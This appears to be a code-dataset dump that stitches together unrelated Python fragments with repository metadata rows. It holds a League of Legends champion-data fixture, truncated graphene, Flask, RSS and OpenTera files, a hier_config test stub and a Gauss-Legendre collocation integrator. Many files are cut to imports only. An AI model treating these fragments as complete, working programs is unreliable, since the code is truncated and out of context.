"rawDisplayName": "GeneratedTip_Passive_IllaoiPassive_DisplayName",
},
"Q": {
"abilityLevel": 0,
"displayName": "\u89e6\u624b\u306e\u9244\u69cc",
"id": "IllaoiQ",
"rawDescription": "GeneratedTip_Spell_IllaoiQ_Description",
"rawDisplayName": "GeneratedTip_Spell_IllaoiQ_DisplayName",
},
"R": {
"abilityLevel": 0,
"displayName": "\u4fe1\u4ef0\u9707",
"id": "IllaoiR",
"rawDescription": "GeneratedTip_Spell_IllaoiR_Description",
"rawDisplayName": "GeneratedTip_Spell_IllaoiR_DisplayName",
},
"W": {
"abilityLevel": 0,
"displayName": "\u904e\u9177\u306a\u308b\u6559\u8a13",
"id": "IllaoiW",
"rawDescription": "GeneratedTip_Spell_IllaoiW_Description",
"rawDisplayName": "GeneratedTip_Spell_IllaoiW_DisplayName",
},
},
"championStats": {
"abilityHaste": 0.0,
"abilityPower": 0.0,
"armor": 41.0,
"armorPenetrationFlat": 0.0,
"armorPenetrationPercent": 1.0,
"attackDamage": 73.4000015258789,
"attackRange": 125.0,
"attackSpeed": 0.5709999799728394,
"bonusArmorPenetrationPercent": 1.0,
"bonusMagicPenetrationPercent": 1.0,
"cooldownReduction": 0.0,
"critChance": 0.0,
"critDamage": 175.0,
"currentHealth": 601.0,
"healthRegenRate": 1.899999976158142,
"lifeSteal": 0.0,
"magicLethality": 0.0,
"magicPenetrationFlat": 0.0,
"magicPenetrationPercent": 1.0,
"magicResist": 32.0,
"maxHealth": 601.0,
"moveSpeed": 340.0,
"physicalLethality": 0.0,
"resourceMax": 300.0,
"resourceRegenRate": 1.5,
"resourceType": "MANA",
"resourceValue": 300.0,
"spellVamp": 0.0,
"tenacity": 0.0,
},
"currentGold": 888.6270751953125,
"level": 1,
"summonerName": "Supername",
"championName": "\u30a4\u30e9\u30aa\u30a4",
"isBot": False,
"isDead": False,
"items": [
{
"canUse": False,
"consumable": False,
"count": 1,
"displayName": "\u92fc\u306e\u30b7\u30e7\u30eb\u30c0\u30fc\u30ac\u30fc\u30c9",
"itemID": 3854,
"price": 400,
"rawDescription": "GeneratedTip_Item_3854_Description",
"rawDisplayName": "Item_3854_Name",
"slot": 0,
},
{
"canUse": False,
"consumable": False,
"count": 1,
"displayName": "\u30d7\u30ec\u30fc\u30c8 \u30b9\u30c1\u30fc\u30eb\u30ad\u30e3\u30c3\u30d7",
"itemID": 3047,
"price": 500,
"rawDescription": "GeneratedTip_Item_3047_Description",
"rawDisplayName": "Item_3047_Name",
"slot": 1,
},
{
"canUse": False,
"consumable": False,
"count": 1,
"displayName": "\u30ad\u30f3\u30c9\u30eb\u30b8\u30a7\u30e0",
"itemID": 3067,
"price": 400,
"rawDescription": "GeneratedTip_Item_3067_Description",
"rawDisplayName": "Item_3067_Name",
"slot": 2,
},
{
"canUse": True,
"consumable": False,
"count": 1,
"displayName": "\u30b9\u30c6\u30eb\u30b9 \u30ef\u30fc\u30c9",
"itemID": 3340,
"price": 0,
"rawDescription": "GeneratedTip_Item_3340_Description",
"rawDisplayName": "Item_3340_Name",
"slot": 6,
},
],
"position": "",
"rawChampionName": "game_character_displayname_Illaoi",
"respawnTimer": 0.0,
"runes": {
"keystone": {
"displayName": "\u4e0d\u6b7b\u8005\u306e\u63e1\u6483",
"id": 8437,
"rawDescription": "perk_tooltip_GraspOfTheUndying",
"rawDisplayName": "perk_displayname_GraspOfTheUndying",
},
"primaryRuneTree": {
"displayName": "\u4e0d\u6ec5",
"id": 8400,
"rawDescription": "perkstyle_tooltip_7204",
"rawDisplayName": "perkstyle_displayname_7204",
},
"secondaryRuneTree": {
"displayName": "\u9b54\u9053",
"id": 8200,
"rawDescription": "perkstyle_tooltip_7202",
"rawDisplayName": "perkstyle_displayname_7202",
},
},
"scores": {
"assists": 0,
"creepScore": 100,
"deaths": 0,
"kills": 0,
"wardScore": 0.0,
},
"skinID": 0,
"summonerSpells": {
"summonerSpellOne": {
"displayName": "\u30af\u30ec\u30f3\u30ba",
"rawDescription": "GeneratedTip_SummonerSpell_SummonerBoost_Description",
"rawDisplayName": "GeneratedTip_SummonerSpell_SummonerBoost_DisplayName",
},
"summonerSpellTwo": {
"displayName": "\u30a4\u30b0\u30be\u30fc\u30b9\u30c8",
"rawDescription": "GeneratedTip_SummonerSpell_SummonerExhaust_Description",
"rawDisplayName": "GeneratedTip_SummonerSpell_SummonerExhaust_DisplayName",
},
},
"team": "ORDER",
}
test_zone = MinimapZone(x=90, y=90, name="TestZone")
test_member = TeamMember(x=100, y=100, zone=test_zone)
| 33.093023 | 103 | 0.613844 |
fedcf036c6fb8965eea9548fe948c1a18ef9db31 | 785 | py | Python | seiketsu/users/schema.py | tychota/seiketsu | 2b5280365b9de44cd84ac65ed74981b30be5cc76 | [
"MIT"
] | null | null | null | seiketsu/users/schema.py | tychota/seiketsu | 2b5280365b9de44cd84ac65ed74981b30be5cc76 | [
"MIT"
] | null | null | null | seiketsu/users/schema.py | tychota/seiketsu | 2b5280365b9de44cd84ac65ed74981b30be5cc76 | [
"MIT"
] | null | null | null | # cookbook/ingredients/schema.py
import graphene
from graphene_django_extras import DjangoObjectField, DjangoFilterPaginateListField, LimitOffsetGraphqlPagination
from .types import UserType
from .mutations import UserSerializerMutation
from .subscriptions import UserSubscription
| 34.130435 | 113 | 0.831847 |
fedd8583c4097da76284324d87da760d236bb283 | 1,026 | py | Python | app/__init__.py | alineayumi/desafio-ton-API-REST | cf9f88adc4f7de6060f2c3f2c31147077c311ce9 | [
"MIT"
] | null | null | null | app/__init__.py | alineayumi/desafio-ton-API-REST | cf9f88adc4f7de6060f2c3f2c31147077c311ce9 | [
"MIT"
] | null | null | null | app/__init__.py | alineayumi/desafio-ton-API-REST | cf9f88adc4f7de6060f2c3f2c31147077c311ce9 | [
"MIT"
] | null | null | null | import os
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask.logging import default_handler
from flask_request_id_header.middleware import RequestID
from app.resources.encoders import CustomJSONEncoder
from app.resources.logger import formatter
from flask_jwt import JWT
db = SQLAlchemy()
| 26.307692 | 86 | 0.789474 |
fee0850f728247adf6624bff53382da94eff6965 | 1,199 | py | Python | tests/test_negate_with_undo.py | robobeaver6/hier_config | efd413ef709d462effe8bfd11ef0520c1d62eb33 | [
"MIT"
] | null | null | null | tests/test_negate_with_undo.py | robobeaver6/hier_config | efd413ef709d462effe8bfd11ef0520c1d62eb33 | [
"MIT"
] | null | null | null | tests/test_negate_with_undo.py | robobeaver6/hier_config | efd413ef709d462effe8bfd11ef0520c1d62eb33 | [
"MIT"
] | null | null | null | import unittest
import tempfile
import os
import yaml
import types
from hier_config import HConfig
from hier_config.host import Host
if __name__ == "__main__":
unittest.main(failfast=True)
| 30.74359 | 101 | 0.692244 |
fee18a5b11572b38d902059c0db310b2cf42cd2d | 6,984 | py | Python | code/gauss_legendre.py | MarkusLohmayer/master-thesis-code | b107d1b582064daf9ad4414e1c9f332ef0be8660 | [
"MIT"
] | 1 | 2020-11-14T15:56:07.000Z | 2020-11-14T15:56:07.000Z | code/gauss_legendre.py | MarkusLohmayer/master-thesis-code | b107d1b582064daf9ad4414e1c9f332ef0be8660 | [
"MIT"
] | null | null | null | code/gauss_legendre.py | MarkusLohmayer/master-thesis-code | b107d1b582064daf9ad4414e1c9f332ef0be8660 | [
"MIT"
] | null | null | null | """Gauss-Legendre collocation methods for port-Hamiltonian systems"""
import sympy
import numpy
import math
from newton import newton_raphson, DidNotConvergeError
from symbolic import eval_expr
def butcher(s):
    """Compute the Butcher tableau of a Gauss-Legendre collocation method.
    Parameters
    ----------
    s : int
        Number of stages of the collocation method.
        The resulting method is of order 2s.
    Returns
    -------
    a : numpy.ndarray
        Coefficients a_{ij}, i.e. the j-th Lagrange polynomial integrated on (0, c_i).
    b : numpy.ndarray
        Coefficients b_j, i.e. the j-th Lagrange polynomial integrated on (0, 1).
    c : numpy.ndarray
        Coefficients c_i, i.e. the collocation points.
    """
    from sympy.abc import tau, x
    # Shifted Legendre polynomial of degree s: d^s/dx^s [x^s (x - 1)^s].
    poly = (x ** s * (x - 1) ** s).diff(x, s)
    # Its roots are the collocation points, in increasing order.
    nodes = sorted(sympy.solve(poly))
    c = numpy.array([float(node) for node in nodes])
    # Lagrange basis polynomials over the collocation points.
    basis = []
    for i, node_i in enumerate(nodes):
        poly_i = 1
        for j, node_j in enumerate(nodes):
            if j != i:
                poly_i = (poly_i * (tau - node_j) / (node_i - node_j)).simplify()
        basis.append(poly_i)
    # a[i][j]: basis polynomial j integrated from 0 to node i.
    a = numpy.array(
        [
            [float(sympy.integrate(l, (tau, 0, node_i))) for l in basis]
            for node_i in nodes
        ]
    )
    # b[j]: basis polynomial j integrated over the whole unit interval.
    b = numpy.array([float(sympy.integrate(l, (tau, 0, 1))) for l in basis])
    return a, b, c
def gauss_legendre(
    x,
    xdot,
    x_0,
    t_f,
    dt,
    s=1,
    functionals={},
    params={},
    tol=1e-9,
    logger=None,
    constraints=[],
):
    """Integrate a port-Hamiltonian system in time
    based on a Gauss-Legendre collocation method.
    Parameters
    ----------
    x : sympy.Matrix
        vector of symbols for state-space coordinates
    xdot : List[sympy.Expr]
        The right hand sides of the differential equations
        which have to hold at each collocation point.
    x_0 : numpy.ndarray
        Initial conditions.
    t_f : float
        Length of time interval.
    dt : float
        Desired time step (adjusted below so that t_f is an
        integer multiple of the actual step).
    s : int
        Number of stages of the collocation method.
        The resulting method is of order 2s.
    functionals : Dict[sympy.Symbol, sympy.Expr]
        Functionals on which xdot may depend.
    params : Dict[sympy.Symbol, Union[sympy.Expr, float]]
        Parameters on which the system may depend.
    tol : float
        Convergence tolerance forwarded to the Newton-Raphson solver.
    logger : Optional[Logger]
        Logger object which is passed through to Newton-Raphson solver.
    constraints : List[sympy.Expr]
        Additional algebraic equations which have to hold
        at each collocation point.
    Returns
    -------
    time : numpy.ndarray
        Time instants, shape (K + 1,) with K the number of steps.
    solution : numpy.ndarray
        State at each time instant, shape (K + 1, len(x)).
    NOTE(review): the mutable default arguments (functionals={}, params={},
    constraints=[]) are shared across calls; they appear to be used
    read-only here, but confirm before mutating them downstream.
    """
    # number of steps
    K = int(t_f // dt)
    # accurate time step
    dt = t_f / K
    # dimension of state space
    N = len(x)
    # Butcher tableau (multiplied with time step)
    a, b, c = butcher(s)
    a *= dt
    b *= dt
    c *= dt
    # generate code for evaluating residuals vector and Jacobian matrix
    code = _generate_code(x, xdot, N, a, s, functionals, params, constraints)
    # print(code)
    # return None, None
    # Compile/execute the generated source; the two callables land in ldict.
    ldict = {}
    exec(code, None, ldict)
    compute_residuals = ldict["compute_residuals"]
    compute_jacobian = ldict["compute_jacobian"]
    del code, ldict
    # array for storing time at every step
    time = numpy.empty(K + 1, dtype=float)
    time[0] = t_0 = 0.0
    # array for storing the state at every step
    solution = numpy.empty((K + 1, N), dtype=float)
    solution[0] = x_0
    # flows / unknowns (reused at every step)
    # fmat is an (s, N) view sharing memory with f, so in-place updates of f
    # by the solver are immediately visible through fmat.
    f = numpy.zeros(s * N, dtype=float)
    fmat = f.view()
    fmat.shape = (s, N)
    # residuals vector (reused at every step)
    residuals = numpy.empty(s * (N + len(constraints)), dtype=float)
    # jacobian matrix (reused at every step)
    jacobian = numpy.empty((s * (N + len(constraints)), s * N), dtype=float)
    for k in range(1, K + 1):
        try:
            # Solve the collocation equations for the stage flows f, with
            # the previous state x_0 held fixed inside the closures.
            newton_raphson(
                f,
                residuals,
                lambda residuals, unknowns: compute_residuals(residuals, unknowns, x_0),
                jacobian,
                lambda jacobian, unknowns: compute_jacobian(jacobian, unknowns, x_0),
                tol=tol,
                iterations=500,
                logger=logger,
            )
        except DidNotConvergeError:
            # Truncate the trajectory: entries time[k:] and solution[k:]
            # remain uninitialized (arrays were allocated with numpy.empty).
            print(f"Did not converge at step {k}.")
            break
        time[k] = t_0 = t_0 + dt
        # Advance the state with the b-weighted combination of stage flows;
        # the minus sign matches the sign convention of the residuals built
        # in _generate_code.
        solution[k] = x_0 = x_0 - b @ fmat
    return time, solution
def _generate_code(x, xdot, N, a, s, functionals, params, constraints):
    """Generate code for the two methods compute_residuals and compute_jacobian.
    Symbolically assembles the collocation residual equations and their exact
    Jacobian, then prints them as Python source defining
    compute_residuals(residuals, f, o) and compute_jacobian(jacobian, f, o),
    where f holds the stage unknowns and o the previous state. The returned
    string is exec()-ed by gauss_legendre().
    """
    # dynamics
    # Substitute the functional definitions into the right-hand sides.
    xdot = [eval_expr(f, functionals) for f in xdot]
    # algebraic constraints
    constraints = [eval_expr(c, functionals) for c in constraints]
    # symbols for Butcher coefficients a_{ij} multiplied by time step h
    asym = [[sympy.Symbol(f"a{i}{j}") for j in range(s)] for i in range(s)]
    # symbols for old state
    # Symbol names are literal array index expressions ("o[0]", "f[0,1]") so
    # the printed code reads directly from the solver's numpy arrays.
    osym = [sympy.Symbol(f"o[{n}]") for n in range(N)]
    # symbols for unknowns (flow vector)
    fsym = [[sympy.Symbol(f"f[{i},{n}]") for n in range(N)] for i in range(s)]
    # polynomial approximation of the numerical solution at the collocation points
    # State at stage i = old state minus the a-weighted stage flows.
    xc = [
        [
            (x[n], osym[n] - sum(asym[i][j] * fsym[j][n] for j in range(s)))
            for n in range(N)
        ]
        for i in range(s)
    ]
    # expressions for the residuals vector
    # Collocation conditions f + xdot per stage, followed by the algebraic
    # constraints evaluated at each stage; the Newton solver drives all of
    # these to zero.
    residuals = [
        fsym[i][n] + xdot[n].subs(xc[i]) for i in range(s) for n in range(N)
    ] + [c.subs(xc[i]) for c in constraints for i in range(s)]
    # expressions for the Jacobian matrix
    # Exact derivative of every residual w.r.t. every stage unknown.
    jacobian = [[residual.diff(d) for r in fsym for d in r] for residual in residuals]
    printer = sympy.printing.lambdarepr.PythonCodePrinter()
    # Total number of residual rows: s*N collocation + s*len(constraints).
    dim = s * N + s * len(constraints)
    # The generated functions use tab indentation and reshape f to (s, N)
    # via a zero-copy view, mirroring the caller's layout.
    code = "def compute_residuals(residuals, f, o):\n"
    code += f"\tf = f.view()\n\tf.shape = ({s}, {N})\n"
    code += "".join(f"\ta{i}{j} = {a[i,j]}\n" for i in range(s) for j in range(s))
    # code += "".join(f"\t{symbol} = {printer.doprint(value)}\n" for symbol, value in params.items())
    # Parameter values are substituted and evaluated numerically (evalf) at
    # generation time, so the emitted code contains plain float literals.
    for i in range(dim):
        code += f"\tresiduals[{i}] = {printer.doprint(eval_expr(residuals[i], params=params).evalf())}\n"
        # code += f"\tresiduals[{i}] = {printer.doprint(residuals[i])}\n"
    code += "\n\ndef compute_jacobian(jacobian, f, o):\n"
    code += f"\tf = f.view()\n\tf.shape = ({s}, {N})\n"
    code += "".join(f"\ta{i}{j} = {a[i,j]}\n" for i in range(s) for j in range(s))
    # code += "".join(f"\t{symbol} = {printer.doprint(value)}\n" for symbol, value in params.items())
    for i in range(dim):
        for j in range(s * N):
            code += f"\tjacobian[{i},{j}] = {printer.doprint(eval_expr(jacobian[i][j], params=params).evalf())}\n"
            # code += f"\tjacobian[{i},{j}] = {printer.doprint(jacobian[i][j])}\n"
    return code
| 31.459459 | 114 | 0.593643 |
fee2dd08a38899ceea87863c92dafc29503606c4 | 525 | py | Python | feeds/rss_feed.py | godwinaden/movie_api_server | 1b467bd91d0a5a9a2f0a2a9fc921b3a4f5c04217 | [
"MIT"
] | null | null | null | feeds/rss_feed.py | godwinaden/movie_api_server | 1b467bd91d0a5a9a2f0a2a9fc921b3a4f5c04217 | [
"MIT"
] | null | null | null | feeds/rss_feed.py | godwinaden/movie_api_server | 1b467bd91d0a5a9a2f0a2a9fc921b3a4f5c04217 | [
"MIT"
] | null | null | null | from sql_app.repositories.movie_repository import MovieRepo
from feedgenerator import RssFeed
from sqlalchemy.orm import Session
| 20.192308 | 59 | 0.704762 |
fee307cf09fb64ad8f6da891a9a28954c9a3eeae | 3,026 | py | Python | teraserver/python/opentera/db/models/TeraDeviceParticipant.py | introlab/opentera | bfc4de672c9de40b7c9a659be2138731e7ee4e94 | [
"Apache-2.0"
] | 10 | 2020-03-16T14:46:06.000Z | 2022-02-11T16:07:38.000Z | teraserver/python/opentera/db/models/TeraDeviceParticipant.py | introlab/opentera | bfc4de672c9de40b7c9a659be2138731e7ee4e94 | [
"Apache-2.0"
] | 114 | 2019-09-16T13:02:50.000Z | 2022-03-22T19:17:36.000Z | teraserver/python/opentera/db/models/TeraDeviceParticipant.py | introlab/opentera | bfc4de672c9de40b7c9a659be2138731e7ee4e94 | [
"Apache-2.0"
] | null | null | null | from opentera.db.Base import db, BaseModel
| 44.5 | 114 | 0.718771 |